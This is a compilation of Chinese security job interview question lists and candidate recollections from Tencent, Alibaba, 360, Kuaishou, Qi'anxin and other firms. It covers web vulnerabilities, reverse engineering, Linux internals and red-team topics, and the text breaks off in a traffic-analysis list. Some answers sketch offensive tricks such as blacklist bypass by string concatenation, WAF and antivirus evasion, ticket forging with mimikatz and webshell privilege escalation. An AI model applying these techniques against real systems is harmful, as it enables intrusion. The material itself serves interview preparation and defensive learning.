在linux下，现在有一个拥有大量ip地址的txt文本文档，但是里面有很多重复的，如何快速去重？
在内网渗透中，通过钓鱼邮件获取到主机权限，但是发现内网拦截了tcp的出网流量，聊一下这个时候应该怎么进行通信？
代码能力怎样，平时有没有做过代码审计？
目前对什么方向感兴趣？

腾讯-安全技术实习生

自我介绍
sql注入了解吗，讲一讲二次注入的原理
二次注入要怎么修复
sql注入过waf了解吗，若一个sql注入过滤了information关键词，怎么绕过
Redis未授权访问
渗透测试的一个完整流程
打ctf的时候有没有遇到什么印象特别深的题目
文件下载漏洞有没有什么比较好的利用方式
利用文件下载漏洞找文件名具体是找什么文件名（读取文件一般会读取哪些文件）（ctf中？实战中？）
命令执行漏洞，http不出网有什么比较好的处理方法（发散一点说）
接上一题，通过隧道通信，详细讲讲通过什么类型的隧道，讲讲具体操作
漏洞预警
有没有复现过中间件类型的漏洞（有没有完整的复现过漏洞）
在学校的攻防演练中扮演的角色的主要职责是什么

腾讯-科恩实验室实习

一面

tcp三次握手
介绍一次渗透测试过程
- 讲了一次代码审计
SSRF漏洞
内网渗透大致流程
再介绍一次难度比较高的渗透测试
防守方有哪些入侵检测手段，有哪些痕迹是可以抓到的‌
介绍进程和线程
进程和线程内存空间的关系
父子进程的介绍
孤儿进程和僵尸进程
- 这个我讲反掉了
kill一个进程的时候，都发生了那些事情，从父子进程角度讲
反弹shell的几种方式
- 本质是用tcp协议传输bash程序
att&ck矩阵的类别，介绍其中的CC
到域名下拿到命令执行的结果
- 这部分没听清楚，面试的时候直接说了不知道，复盘听录音还是没怎么听清，但好像大概想问的是DNS域名解析获取命令执行回显
Linux命令通配符
护网的溯源、威胁分析工作之类的问了十分钟左右
- 完全不会，以后简历上再也不写护网了
xx攻防演练中防守方有哪些手段，问的比较杂，主要就是问入侵痕迹检测和溯源之类的东西
- 这部分也不太会
SVM、KNN介绍
卷积神经网络介绍
莱文斯坦距离
搜索引擎算法
- 不太了解，大概讲了下字典树
倒排索引
恶意样本给出函数家族的md5，如何进行分类
- 从统计规律讲了下
反问

二面

第一个问题就直接问了护网，和一面问的差不多，直接裂开
Linux开机自启动方式
init.d脚本介绍
Linux怎么查看程序调用了哪些文件
如何监控Linux文件操作
- 问到这里就已经非常慌了，Linux比较进阶的操作都不是很会，而且面试官一直在叹气我日
Linux有哪些系统调用
- 不会
GDB调试
- 不会
查看Linux开放的网络端口、多线程状态
反弹shell的方式
Linux下怎么隐藏文件
子域名收集
DNS重绑定
DNS解析的流程
CC流量
- 听都没听过
ssh隧道
- 面试没听清楚，听到隧道就以为是UDP穿越隧道开讲了
https证书机制介绍
burpsuite一些使用方法，插件开发方法
nmap的基本操作
syn开放链接原理
redis漏洞利用
runc容器逃逸原理
常见WAF种类(不知道为什么还特别问了长亭的WAF)
MySQL的UAF
- 没听过
算法题(比较简单，leetcode easy级别)
Linux进程通信
反问

腾讯-科恩实验室实习

一面

自我介绍
简单介绍做的项目->基于项目的衍生（搜索域、搜索方法等）
逆向C++相比起逆向C有哪些困难点？有用IDA python吗？
Linux程序分为哪几个段？
.data段存放哪些数据？.bss段存放哪些数据？
函数调用时的流程，参数如何传入，寄存器的变化，栈的变化？
解释程序的编译和链接，编译的过程中会有哪些操作（编译原理），If/Else语法树？
了解Linux /proc目录吗？如果要查看进程打开了哪些文件，有哪些方法？
人脸识别有哪些方法？怎样去进行相似度比对？有没有听过三元组损失
如何比较两篇英文文献的相似度？如何比较两个C函数的相似度？
什么情况下源代码与IDA反编译程序的代码差别很大？讲讲函数展开造成的区别？如何消除这种区别实现代码相似度匹配？
了解TF-IDF文档匹配算法，搜索引擎的算法吗？
python中集合，求交集与并集的时间复杂度是多少？有没有o(1)的方法，迅速判定元素是否在集合中？

二面

工控场景的入侵检测与普通场景入侵检测的区别（简历项目）
有了解过真实场景的入侵检测项目吗？（如一个企业办公的出口网部署入侵检测）
面对加密后流量，正常访问与木马的区别可能有哪些？如何用AI或传统方法进行检测？是有监督问题还是无监督问题？
面对静态编译的大型木马（几百M…），如何通过IDA定位其网络传输部分的逻辑？
如何动态地去找导入表->从攻击者的角度，如何不在编码时直接导入相关API的前提下进行攻击？
Windows下有哪些常用的反调试技术？
单步执行的原理是什么？
在内存中已Load的程序，如何快速找到其具有执行权限的段？
恶意软件有哪些方案检测自己处于沙箱中？
怎么知道进程和其开的端口的对应关系？
SGD和Adam的区别？
神经网络架构搜索领域目前的进展
WAF的实现原理，与IDA的区别，WAF针对包会检测哪些字段
简介Linux下的Syscall
工作中符合个人兴趣的研究项目或思路
如何缩减模型的检测时延？
如何降低模型的误报率？
如何找攻击样本？

腾讯-玄武实验室

自我介绍
讲解一下CSRF原理吧
什么时候接触web安全的
为什么学WEB安全
参加过哪些比赛
你发挥了那行作用
讲讲反序列化吧
说一说最近你关注的安全圈大事
那你说说你遇到最优印象的吧
我看你简历上有黑盒测试说一说吧
- 一个是钱包的测试一个是交易所的测试，钱包主要是信息泄露，水平越权
怎么发现的
- 信息泄露是webpack可以直接查看api 等调用信息，水平越权是构造josn包返回了用户数据账户密码之类的
怎么构造的
那继续说说交易所
（区块链相关）讲一讲逆向函数涉及到的接收参数的指令集
说说重入漏洞
有对最近那个最大的区块链安全事件有了解吗
好，那你对密码学有什么接触嘛
我看你简历有许多对Defi的审计，那你有什么对漏洞的挖掘的经验吗
嗯好那现在我问你个问题你思考下在DEFI项目中建立了各种各样的经济模型怎样才能找出可能存在的漏洞
讲讲你对未来可能出现的新型漏洞的猜想吧
有一种游戏在猜对正确答案后可获得奖励
反问

腾讯

一面

编写工具的具体思路，sql注入，xss
csrf的防御， referer验证，referer为空则防御(referer是浏览器特性，为空排除特性之外的问题则做防御验证)，
xxe无回显探测 dns验证，内部实体探测
xss硬编码如何利用前端dom型被js代码转义出来，比如\u003c,前提是返回在了js中，在html中除非具备某种标签，其特性可导致特殊编码执行，则能转义出来
java反序列化基础
白盒审计能力问题–这一点应该说可以自行拓展，对owasp10做过调试，对tp审计做过深入调试，对rmi反序列化做过调试，学习过一本书的样子
密码重置处的逻辑问题–第一二三步验证不统一，验证统一但后台返回的更改密码的token可被预测，枚举可猜解，返回敏感数据，后端与前端验证不一致，存在数据查询则可注入，xss编码问题

二面

问了各种问题，包括项目中如何解决问题，应急响应做过哪些处理，针对大量请求高并发的解决有很多具体的场景，询问你的思路聊了国家安全，各种安全视界的思考，见识

小鹏汽车-安全工程师

自我介绍
有没有挖过src？
平时web渗透怎么学的，有实战吗？有过成功发现漏洞的经历吗？
做web渗透时接触过哪些工具
xxe漏洞是什么？ssrf是什么？
打ctf的时候负责什么方向的题
为什么要搞信息安全，对安全这一块有多大的兴趣，以后会不会转行，还是打算一直从事安全方面工作
自己平时怎么学安全的，如果让你做一个新的方向（app安全），会投入多少时间去学习，还是说有自己想做的方向
聊一聊代码审计的流程
平时是怎么做代码审计的
有没有审计过开源框架、CMS？
怎么判断一个数据库是mysql还是oracle的？
sql注入的种类，利用方式？
聊一聊sql注入的原理及防御思路
做开发的时候用的是什么语言
做java开发的时候用过什么框架，能不能做java安全开发
有没有做过安卓开发
有没有用python写过工具？
msf利用的是哪个漏洞，有没有成功反弹？
护网的时候主要做了些什么，聊一聊对安全产品的理解
公司现在需要做app安全的人，现在要你做的话，你会去学吗，或者说感兴趣吗，还是说有别的想做的，不想做app安全，能投入多少时间去学
内网渗透了解吗？聊一聊内网渗透的思路

阿里巴巴-阿里云安全

一面

自我介绍一下，讲一下课题和课外实践？
WAF管理平台后端API有做过压力测试吗？
你现在的论文已经发表了吗？
你的毕业论文是什么？
在字节跳动训练营最大的收获是什么？
在研究生期间或日常生活中有什么可以分享的有意义的事情？
快排的时间复杂度是多少？
- 最快的情况下是多少？是什么样的情况？
- 最慢的情况下是多少？是什么样的情况？
哈希冲突有哪些解决办法？
编程题(easy)

二面

自我介绍一下？
我们这里是密码管理服务，密码这块你了解多少呢？
你未来计划更偏向于安全研究还是安全研发？
你对云上PKI的安全，身份认证的能力感兴趣吗？
介绍一下字节跳动训练营做了什么？
- Sql注入的原理和防御方案有哪些？
- WAF防护SQL注入的原理是什么？
- 本次训练营中，怎么分工协作的？你的角色是什么？你的贡献是什么？有没有提升效率的可能？
- 漏洞挖掘是纯工具还是有一些手工的？
- WAF管理平台后端API有哪些功能？
- WAF的增删改查数据量大吗？
- Redis解决了什么问题？
- 热点数据怎么保证redis和db中的一致？
- 用户登录认证是怎么做的？
- Token的安全怎么保护？
- Token的内容该如何设计？
- 怎么保证数据不被篡改呢？
SDN漏洞挖掘的思路？
- 漏洞挖掘有挖掘出RCE漏洞吗？
- 对栈溢出、堆溢出有研究吗？
说一下https协议的过程？
- 随机数一般有几个？
- 如果有一个的话会如何？
对C++或C熟悉吗？
哈希表的原理和冲突解决办法？（和一面重复了）
Mysql查询快的原因？
- 事务的四大特性，mysql隔离级别？
- 解释一下乐观锁和悲观锁？
多并发编程有涉及过吗？
- 读写锁和互斥锁/排他锁用过吗？有什么区别？为什么会用？
有一项软件著作权，做的什么软件？
编程题(medium)

三面（交叉面）

字节跳动训练营越权问题解决办法？
- 防火墙都是自己写的规则去防御吗？
- 任务都是一样，你们得了第一，你们团队做的好的地方在哪里？
SDN漏洞挖掘项目，你能列举一个比较有技术含量的漏洞吗？漏洞原理和挖掘过程？
Python2和Python3的区别？

Xrange和range返回的是什么？

数据库索引的作用？mysql索引的变化？
数据库弱口令，登进去后如何提权？
你自己写项目的时候，怎么进行的 SQL注入防御？
怎么进行CSRF防御？

Token加密什么东西？
校验什么？
Token为什么需要加密？
使用明文随机数可以吗？

怎么防重放攻击？
Docker有哪些安全上的好处？
个人发展方向？
当前在哪里日常实习？
实习多久了？为什么想来阿里？

58同城-安全工程师

你先做个自我介绍吧
假如说有个SQL注入如下
```
select * from user where userid = {};
```
1. response里面没有返回内容
2. 1s就超时了，直接返回404页面
这种情况下如何注入?
比如说我写一个安全SDK
1. sql注入的修复, 怎么写(伪代码)
  
  答：我倾向于使用预编译的方式
2. 但是预编译的话, 研发可能不会用怎么办呢, 就是说如果他觉得改起来太麻烦了能不能更方便一点. 因为预编译的话, 我每条SQL每条查询都得去改.
  
  答：那设计一个白名单怎么样呢
3. 那你大概写一下怎样设计一个白名单. 你可以分场景, 比如说什么场景什么场景的SQL注入, 或者是参数里面应该做什么操作
4. xss的修复, 怎么写(伪代码) 答: 用实体化转义
5. 但是我们有一个场景啊, 你看我们上传简历这里, 有时候会支持上传html的简历, 对吧. 他本身业务就需要用到html, 如果用html实体化转义的话, 他全都会被转义, 那这样的话业务就崩了嘛, 对不对. 那这种情况下我们要怎么样去写一个xss的过滤, 或者是说转义, 去解决这个类似于简历这个场景. 你可以想一想, 写不出来代码也没关系.
  
  答：白名单限制, 黑名单过滤.
6. 其实我们自己是这样做的, 对于这种情况, 我们第一是会做一个html标签的白名单, 第二是事件的白名单. 黑名单我们就不搞了.
7. rce的修复, 怎么写(伪代码)(java或者python的命令执行) 答: 白名单限制, 只允许需要的函数. 但RCE的话我感觉在业务场景当中, 一般来说也不是很容易出现面试官: 欸, 我们就出现了很多. 尤其是运维部门.
  
  我: 我打CTF比较多, 我了解的RCE都是PHP方面的. 比如说system, popen之类的. 一般来说都是直接做过滤
8. 那PHP中这些函数全部被黑名单了, 你还有什么方法
  
  答: 字符串拼接 $a=p.h.p.i.n.f.o()
9. 你有没有用过php里面的反引号啊
  
  答: 还有用 chr() 函数来绕过
10. 面试官: 编码是吧
11. xxe的修复, 怎么写(伪代码) 答: 对XXE来说, 我只了解他的攻击方式, 对他的防御不是很了解. 攻击方式就是做XML的外部实体化注入. 一个攻击模板, 可以读文件, 可以做命令执行
12. XXE怎么做命令执行呢, 就拿php来说, XXE怎么做命令执行
13. XXE这个命令执行是要他的服务端本身支持某些特殊的协议, 一般来说是不行的
了解过自动化代码审计的工具吗, 类似于fortify这种

答: 我只用过那个一个比较老的那个, 我想不起来了(指seay)
没关系, 那你有没有了解过他的一些原理, 大概怎么做的

我: 他原理一般都是通过匹配一些特殊函数, 去定位可能出现漏洞的函数的位置
但这种的话他误报很高欸, 就像我这种RCE的话, 你直接匹配的话他很多都是误报了, 很多他都不是web思路的

我: 还有一种是, 给他加一些自定义规则
那有没有更好的办法呢, 误报太多了我们没办法接受啊

我: 我有一个想法就是, 他自己匹配了之后, 能不能从前端从一个黑盒的层面再去验证一遍
那黑盒验证, 我就有需求是, 首先我得知道, 首先我php里面我这个函数到底是哪个入口传进来的, 对吧. 但这个有可能经过了层层调用, 甚至有可能是include()这种, 那这种的话, 对于我来说 , 我并不知道他影响到了哪一些入口, 这种情况怎么办呢
你们学校有学编译原理吗
其实我觉得安全专业还是要学一下编译原理
有没有搞过linux的这种后渗透相关的
1. 面试官: 比如这个linux被我攻陷了, 我想去拿到更多的信息, 比如说一些横向的信息, 那种有没有搞过我: 这种不是很了解, 但windows的会一点
2. 面试官: 那你可以简单讲一下, 比如你先攻陷一台windows的机器, 然后我想在这个windows的域内去做一些横向移动, 我想把这个windows的域的权限给拿到, 这种你该怎么做我: 通过票据伪造, 白银票据和黄金票据面试官: 你这个票据伪造要怎么做呢我: 一般用mimikatz就可以了吧
3. 面试官: 你mimikatz抓取的是内存里面的密码和一些他的票据, 那我如果本身是低权限的呢, 就我本身抓不了密码, 或者我抓到的用户密码并不是域账号的, 是一个低权限账号呢. 因为大部分渗透进来都是个应用, 应用他可能并没有域权限我: 从低权限往上提
4. 面试官: 那你一般会怎么提权我: 一般windows的漏洞吧面试官: 那现在就用这个windows系统的提权, 我现在就一个webshell, 那我怎么样去提权
5. 面试官: 你可以这样嘛, 你上传一个提权的脚本或者exe嘛, 你webshell去跑这个exe, 他就把这个web应用权限提权了
那你最后有什么想问我的吗

360-安全工程师

自我介绍
WAF及其绕过方式
IPS/IDS/HIDS
云安全
怎么绕过安骑士/安全狗等
Gopher扩展攻击面
Struct2漏洞
UDF提权
DOM XSS
数据库提权
怎么打Redis
内网渗透
容器安全
k8s docker逃逸
linux、windows命令：过滤文件、查看进程环境变量
站库分离怎么拿webshell

360

红队&&企业蓝军方向

以下都是同一场面试提的问题，两个面试官，一个代审一个红队，时长接近两小时

shiro 如何绕 waf
weblogic 如果在打站的时候，一旦遇到了 waf，第一个 payload 发过去，直接被拦截了， ip 也被 ban 了，如何进行下一步操作
jboss 反序列化原理
weblogic 反序列化原理，随便说一个漏洞，然后说触发原理
fastjson 怎么判断是不是有漏洞，原理是什么
fastjson 判断漏洞回显是怎么判断的，是用 dns 做回显还是其他的协议做，为什么
fastjson 高版本，无回显的情况，如何进行绕过，为什么可以这样绕过
代码审计，做过哪些，主流的代码审计 java 框架请简述
泛微，致远，用友这三套系统代码框架简述
泛微的前台漏洞触发和后台漏洞触发，如何通用性的挖泛微的洞，泛微能反序列化吗，怎么挖
php 代码审计如果审计到了一个文件下载漏洞，如何深入的去利用？
php 里面的 disable_function 如何去进行绕过，为什么可以绕过，原理是什么
假如说，在攻防的时候，控下来一台机器，但是只是一台云主机，没有连接内网，然后也没有云内网，请问怎么深入的对这台云主机进行利用？
redis 怎么去做攻击，主从复制利用条件，为什么主从复制可以做到拿 shell，原理是什么，主从复制会影响业务吗，主从复制的原理是什么？
becl 利用链使用条件，原理，代码跟过底层没有，怎么调用的？
假如我攻击了一台 17010 的机器，然后机器被打重启了，然后重启成功后，机器又打成功了，但是无法抓到密码，为什么无法抓到，这种情况怎么解决这个问题？
内网我现在在域外有一台工作组机器的权限，但是没有域用户，横向也不能通过漏洞打到一台域用户的权限，但是我知道一定有域，请问这种情况怎么进入域中找到域控？
jboss 反序列化漏洞原理
内网拿到了一台 mssql 机器的权限，但是主机上有 360，一开 xpcmdshell 就被拦截了，执行命令的权限都没有，这种情况怎么进行绕过。
什么是 mssql 的存储过程，本质是什么？为什么存储过程可以执行命令？
如果想通过 mssql 上传文件，需要开启哪个存储过程的权限？
内网文件 exe 落地怎么去做，用什么命令去执行来落地，如果目标主机不出网怎么办？
内网域渗透中，利用 ntlm relay 配合 adcs 这个漏洞的情况，需要什么利用条件，responder 这台主机开在哪台机器上，为什么，同时为什么 adcs 这个漏洞能获取域管理员权限，原理是什么
内网域渗透中，最新出的 CVE-2022-26923 ADCS 权限提升漏洞需要什么利用条件，原理是什么，相比原来的 ESC8 漏洞有什么利用优势？
内网渗透中，如果拿到了一套 vcenter 的权限，如何去进一步深入利用？db 文件如何解密？原理是什么？
vcenter 机器拿到管理员密码了，也登录进去了，但是存在一个问题，就是内部有些机器锁屏了，需要输入密码，这个时候怎么去利用？
内网权限维持的时候，360 开启了晶核模式，怎么去尝试权限维持？计划任务被拦截了怎么办？
mssql 除了 xpcmdshell，还有什么执行系统命令的方式？需要什么权限才可以执行？
如果 net group “Domain Admins” /domain 这条命令，查询域内管理员，没法查到，那么可能出现了什么问题？怎么解决
查询域内管理员的这条命令的本质究竟是去哪里查，为什么输入了之后就可以查到？
免杀中，如何去过国内的杀软，杀软究竟在杀什么？那么国外的杀软比如卡巴斯基为什么同样的方法过不了呢？
免杀中，分离免杀和单体免杀有啥区别，为什么要分离，本质是什么？
打点常用什么漏洞，请简述
内网横向中，是直接进去拿一台机器的权限直接开扫，还是有别的方法？
钓鱼用什么来钓？文案思路？如何判断目标单位的机器是哪种协议出网？是只做一套来钓鱼还是做几套来钓鱼？如何提高钓鱼成功率？
钓鱼上线的主机，如何进行利用？背景是只发现了一个域用户，但是也抓不到密码，但是有域

快手-安全实习生

一面

自我介绍
问项目
针对项目问了很多详细的问题，不便透露，通用问题如下：
做项目的时候有没有遇到什么问题，怎么解决
做项目学到了什么东西
项目中有没有什么地方自己做过优化
有没有对网站做过渗透测试
Linux操作熟悉吗，怎么看进程PID
用过什么数据库，答：sqlite,mongodb,面试官好像不太了解没咋问
为什么用mongodb
了解ES吗(Elasticsearch)
HTTPS建立过程
python怎么管理内存
深拷贝和浅拷贝区别
python多进程、多线程、协程有用到吗，都在什么地方用到
python可以实现真正的多线程吗
代码题：ip排序

（转成元组排序就行了，记得把str转成int，不然192会比50大）

输入：iplist = ["1.1.1.1","192.168.1.110","10.192.2.4","10.50.2.3","10.50.2.10","111.120.12.1","172.18.5.112"]
输出：
1.1.1.1
10.50.2.3
10.50.2.10
10.192.2.4
111.120.12.1
172.18.5.112
192.168.1.110

写Web API的时候怎么防止SQL注入
怎么防XSS
了解越权漏洞么，有没有挖过越权漏洞
有没有什么比较擅长的我还没问到的

二面

问项目
项目哪一块时间花的比较多
怎么溯源攻击
举一个溯源攻击的例子
怎么检测webshell
sql注入在mysql和sqlserver中有什么区别
想找安全开发的岗位还是安全研究的岗位
代码题：手机九宫格键盘，输入数字，输出所有的字母组合

如输入23，输出[‘ad’,‘ae’,‘af’,‘bd’,‘be’,‘bf’,‘cd’,‘ce’,‘cf’]
讲一下DNS协议的作用、解析过程
DNS协议的安全问题
实习时间

快手-安全工程师

自我介绍
介绍项目
Linux提权方式，脏牛提权原理
公司中了勒索病毒怎么办、分哪几步，勒索病毒原理，勒索病毒是怎么传播的
如何绕过waf
SQL注入的种类，怎么防御SQL注入，业务层面防止SQL注入的方法
哪些情况SQL预编译无效
怎么判断服务器是Windows还是Linux，能不能用ping命令判断
了解的安全论坛有哪些
平时有什么兴趣爱好
学习过程中遇到的最大的挑战或困难
反问

快手-安全实习生

一面

自我介绍
问项目
针对项目问了很多详细的问题，不便透露，通用问题如下：
做项目的时候有没有遇到什么问题，怎么解决
做项目学到了什么东西
项目中有没有什么地方自己做过优化
有没有对网站做过渗透测试
Linux操作熟悉吗，怎么看进程PID
用过什么数据库，答：sqlite,mongodb,面试官好像不太了解没咋问
为什么用mongodb
了解ES吗(Elasticsearch)
HTTPS建立过程
python怎么管理内存
深拷贝和浅拷贝区别
python多进程、多线程、协程有用到吗，都在什么地方用到
python可以实现真正的多线程吗
代码题：ip排序（转成元组排序就行了，记得把str转成int，不然192会比50大）
写Web API的时候怎么防止SQL注入
怎么防XSS
了解越权漏洞么，有没有挖过越权漏洞
有没有什么比较擅长的我还没问到的

二面

问项目
项目哪一块时间花的比较多
怎么溯源攻击
举一个溯源攻击的例子
怎么检测webshell
sql注入在mysql和sqlserver中有什么区别
想找安全开发的岗位还是安全研究的岗位
代码题：手机九宫格键盘，输入数字，输出所有的字母组合
如输入23，输出[‘ad’,‘ae’,‘af’,‘bd’,‘be’,‘bf’,‘cd’,‘ce’,‘cf’]
(我就模拟做)
讲一下DNS协议的作用、解析过程
DNS协议的安全问题
实习时间

快手-安全工程师

技术类：

1，自我介绍

2，根据简历逐步问技术，问工具的具体使用

3，SQL注入漏洞，类型，可以造成什么危害

MSSQL与Oracle

SQL注入写入Shell的具体命令

4，XSS，存储型怎么利用，有哪些危害，除了钓鱼

带外COKIES的时候，遇到WAF怎们

5，AWVS登录扫描怎么操作，SQLMAP怎么用，有那几个级别，分别有什么区别，参数

SQLMAP如何扫数据包，本地读文件，指定参数，这些的具体命令

6，如何绕过WAF

7，如何入侵快手

视频上传点、社工，钓鱼邮件

供应链攻击

8，钓鱼邮件你会用那些恶意木马、shellcode

9、NMAP如何静PING扫描，如何看端口开放，如何看系统版本信息，具体的命令是什么

编程题：比较version号不同，写了大概思路，但是细节没处理好，直接给面试官说放弃了，面试官问了思想，然后又问特殊情况，想了一下，实在想不错

经历类：

1，你挖到的比较有意思的漏洞

2，你最近学习的东西，比较有意思的

反问：

1，甲方安全与乙方安全有啥不同，

2，感觉自己答得磕磕绊绊的，希望面试官能给一些后续的学习建议

总结：

面试体验非常好，中间说了好多不会，面试官也没有非常生气，还是完整的走完流程，最后给了很好的学习建议。

对于工具的使用问题问的很细致，但是最近都在手工渗透，复测，自然没有经常用工具，哎，反正感觉每场面试问的都很不一样。

快手-安全工程师

自我介绍

2、介绍下项目

3、介绍实习

4、信息收集

5、给你一个网站，你会怎么去挖掘漏洞

6、sql注入修复意见

7、XSS修复意见

8、弱口令修复意见

9、数据库操作

10、手撕代码，我代码真不行，题目：给你几个版本号如：1.3.2，2.1.4，1.0，让你判断版本号大小

11、操作系统查看最近登陆的用户

12、查看文件的最后300行

13、文件的权限777之类的

14、osi7层

15、tcp3次握手

16、反问

华顺信安-安全服务工程师

自我介绍
红蓝队经验
关于shiro漏洞了解多少
说说你APP测试的经验
xposed用的什么框架，有没有自己写过app解密
Xss、SSRF、SQL 产生的原因，修复方案？
如果你Xss打了后台，发现是内网的怎么办
假设给你一个目标站，你要怎么做？
linux和windows提权知多少。
会不会进程注入？
做过几次应急？
讲讲windows和linux应急你咋做的
用过没用过我们家的goby和fofa?
会不会apk反编译？
你python水平咋样？
你php怎么审的

奇安信面试复盘

MVC框架详细说一下
详细介绍一下sql注入
xss与csrf的区别
csrf的原理以及如何防范
还有什么你擅长的但是没有问到的吗
讲一下xxe的原理
xxe会用到哪些函数
文件上传，详细说说
常见的web容器有哪些
apache 7.0 文件上传黑名单怎么绕过，详细说说
密码学的对称密码与非对称密码有哪些
md5是不是对称加密
apache可以执行php文件吗
了解哪些数据库
说说反序列化的原理
反序列化会用到哪些函数
xxe有没有实战过
java的多线程
python有过哪些项目，写过什么东西
之前python学到什么地方

奇安信-安全研究员-实习

一面

自我介绍，内容包括：第一部分，做过的安全相关的有难度的项目，难点在哪。第二部分，安全技能树，哪些是比较擅长的，能做什么。
讲讲linux平台的漏洞缓解机制
讲讲linux平台的ELF文件结构，或者windows平台的PE文件结
NX是怎么绕过的
讲讲ASLR怎么绕过
用过kali的msf吗？都用来干嘛了，哪些工具用的比较多？
函数的调用约定有哪些?区别是什么?32与64位有什么不同
用fuzzing主要是用来干嘛？主流的产品（chrome那些）有挖过漏洞吗？
对windows平台的漏洞和保护机制了解多少？
分析过linux的公开漏洞吗？写过exp吗？
有没有逆向分析过linux平台下的病毒
英文水平怎么样

二面

聊了一下我现在做的fuzzing，之前做过的APT实习

三面

聊对奇安信的了解，聊人生

6月1号打电话说过了，6月10号收到offer：珠海安全研究员

奇安信 A-TEAM

我投的这个岗位是奇安信A-TEAM的渗透测试，这个团队方向是以红队为主。面试流程是我体验最快的一家，可能是由于已经快11月份了，所以采取了滚动批次面试的方式，一个下午就完成了面试流程。面试官问的东西技术难度比较广和深，而且都是基于实际的应用场景来问的。所以基本杜绝了做题和背题的方式，需要一定的实战经验和见识。

一面

sql注入基于利用方式而言有哪些类型？

2、sql注入写马有哪些方式？

3、oracle注入除了注入数据之外有哪些直接利用的方式？(这个真没见过，答不出来)，sqlserver获取shell的方法？

4、xss的利用方式？

5、同源策略的绕过方式？

6、完整的渗透测试流程思路？(从拿下webshell到后渗透的实战经历)

7、如何绕过基于语义检测的waf，比如雷池，阿里云waf等(不是太理解语义这东西，说了一些我知道的绕过场景)

8、问了预编译场景下是否存在sql注入。(这一点老实说并不存在，但面试官提到第一次预编译的过程假如存在可控数据，这确实是可能的，我说了自己的看法)

9、编程问了个多线程和协程的区别。

二面

1、问了项目的实现思路和方法。

2、黄金票据和白银票据的区别？

3、pth中LM hash和NTLM hash的区别(这个之前做过研究，不过只记得一点了)

4、CDN的绕过方式？

5、waf的绕过方式？

6、其他忘了

三面

1、问了学校经历

2、问我自己觉得是个内向还是外向的人？？？(事实上我觉得让自己来评判这个问题没有意义，我可以把自己塑造得很内向，也可以说得很外向，但性格是矛盾和多样化的，用这样非黑即白的问题去询问，反而不如直接问平时相关的经历和事项)

我:我觉得性格这个东西是不应该一概而论的，我觉得我既不内向，也不外向。不如让我说说我的其他经历和思考。您这边来看看我是什么样的。是否适合这个岗位。剩下就balabala

3、询问其他offer状况

京东-安全研发

首先根据简历提问
问我的一个项目完成的怎么的样了，//简历中的
Java基础怎么样，
有没有自己动手写过一些工具
有没有想过自己以后要写一下扫描器
sql注入的简单原理及其如何防御
有没有了解过反序列化尤其是Java方向的
数据结构还记得多少
src主要挖掘一些什么类型的漏洞
了解的MSF框架怎么样
数据库主要了解的哪些，主要学的什么数据库
ssrf的原理及其防御 —> 这有深入

京东-安全研究

深挖项目。

每个项目的主要难点，以及你做了什么，提到的有中间人攻击、数字证书之类的。
Java八股

final关键字的用途？

static关键字的用途？两者的区别？

非对称密码算法和对称密码算法的区别和联系？

RSA的数学证明？

为什么web端的数字证书能够被抓包解析之类的？

序列化和反序列化中有什么漏洞？

还有记不清了哈哈哈

手撕代码以及优化

斐波那契递归

双指针

快速查询

安恒面试复盘

sqlmap爆出当前库名的参数是什么？
namp探测系统的参数是什么 —>大写还是小写
namp的小写o与a是干嘛的
布尔型盲注的具体语句是什么
宽字节的原理
python有没有反序列化
get传参与post传参的区别
Http有哪些请求方式
如何判定cdn与cdn的作用
如何确认服务器的真实IP
详细说了说信息收集过程
一串编码如何确认是base64
栅栏密码的原理是什么
base64与md5如何区别
oracle的默认端口是多少
mysql的管理员密码一般放到哪
如果substr()函数被禁用，你脑子里有多少替换函数
redis如何拿下，哪个端口，具体语句，具体操作
如何通过邮箱知道对方的IP
说一下同源策略
如何收集网站管理员邮箱等等
ssrf有哪些危害
如何防御ssrf–>问的较深---->建议在详细了解一下
Linux的某两个文件怎么分辨（忘了具体是哪两个文件了）
MSF框架稍微问的深入了一些
web容器（中间件）有哪些解析漏洞与原理
如何防范sql注入 —>这问的很深

浙江东岸检测

xss的标签
说说大学这几年，你最自豪的事情
简单说说sql注入
说说偏移注入
说说ctf你都做哪些题型
遇到的比较困难的web题型的ctf题目
xxe了解吗，有没有自己审计出
说说反序列化
bypass说说
假如，让你设计一个waf，你会怎么设计
内网渗透与提权了解吗
平常都挖掘哪些src
有没有自己手写过一些脚本
说说sql注入，手工怎么爆出所有库名字

某一线实验室实习

技术面

面试官：你好，听说你对来我们公司的意愿非常强烈，是为什么呢

我：因为我在项目中与贵公司的人员有过合作，感觉无论是技术还是硬件或者是待遇都算圈子里一流的

面试官：那你了解我们实验室吗？

我：我有了解过，巴拉巴拉说了一下
面试官：那我先给你介绍一下实验室的方向，分为三个方向….

我：好的明白了
面试官：你在项目中是否使用过我们公司的设备，感觉使用体验如何（意思就是让说设备的优缺点）

我：那我就实话实说了？
面试官：没问题的，我就想听听你的意见

我：我使用过…. ,优点就是性能好，能探测到更多的威胁情报之类的（大家脑补吧），感觉不足的就是探测和分析出的威胁，没法给出具体的流量片段，没法通过一个设备有效确定攻击，没有流量特征不好和其他全流量设备进行联动，可能是设备出场的保护机制，保护特征库不被外泄。
面试官：你知道主流的设备原理和开发过程吗

我：（我就说了一下原理，还不知道对不对）
面试官：你在项目中是做过流量分析对吗？能不能说说你的具体案

我：我在国家hvv中协助发现过0day，单独发现过frp反弹定时回确认包向外输送流量，shiro反序列化等漏洞（我主要讲了我frp反弹的发现思路和流程）
面试官：除了这些常规的特征发现，你自己还有什么快速确定的方法吗？

我：（给大家分享一下我自己的流量分析心得）
1. 确定事件的类型（确定事件是什么样的攻击，比如sql注入和爆破和frp的流量分析步骤就不一样）
2. 确定事件的时间，首先划定一个时间段
3. 确定数据流，攻击的数据流我们是要看HTTP，TCP，还是ssh
4. 分析是内网—>外网还是外网—>内网，内网和外网时两种查询方法，正确的查询能有效的通过分析更少的数据包获取结果比如内网—>外网我们确定后，第一步肯定先去先查看外网ip的流量，判断行为外网—>内网这样一般都是拿下了一个外网的服务器当做跳板机，我们肯定要先去分析内网的受害者服务器，看看有没有被攻击成功
5. 首先我们需要确定到攻击行为后，再深入的流量分析和应急响应，很多都是误报
6. 数据包的大小也是分析的条件，分析SSL数据包需要解密
  - 爆破攻击
    1. SMB,SSH,MSSQL等协议比较多，看包的大小，成功登陆的包很大
    2. 看ACK，SYN包的次数，如果成功至少20起步，放到科莱上为40起步，但是注意不是失效包和重传的包（注意加密流的ack和syn包也很多，为客户端一次，服务端一次）
  - 重传攻击：
